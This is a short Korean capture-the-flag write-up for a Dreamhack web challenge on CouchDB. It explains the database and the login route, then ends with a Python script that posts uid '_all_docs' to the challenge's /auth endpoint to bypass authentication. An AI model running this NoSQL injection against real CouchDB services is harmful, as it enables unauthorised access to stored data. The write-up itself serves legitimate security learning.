NoSQL-CouchDB [WEB LEVEL1]

문제 정보

CouchDB : 문서기반의 데이터베이스이다. 키와 값이 하나의 쌍을 이루는 데이터를 저장하며, JSON 객체 형탱인 도쿠먼트를 저장한다.

HTTP 기반의 서버로 동작하며 REST API형식으로 HTTP메소드를 사용해 요청을 받고 처리한다.

 

문제 정보

로그인페이지에서 uid와 upw 를 입력을 해서 flag값을 없는거 같다.

 

소스코드

소스코드를 보면 /auth에서 인증과정을 거칠때, upw값이 같으면 flag값을 출력해주는 코드이다.

즉, 계정정보를 알아야지 풀리는 문제이다.

 

개발자 도구

uid에 "admin" 을 넣고 upw에 "aaa" 넣었을 때의 페이로드이다.

 

 

import requests

url = 'http://host3.dreamhack.games:11764/auth'

data = {
    "uid":"_all_docs"
}

req = requests.post(url,json=data)

print(req.text)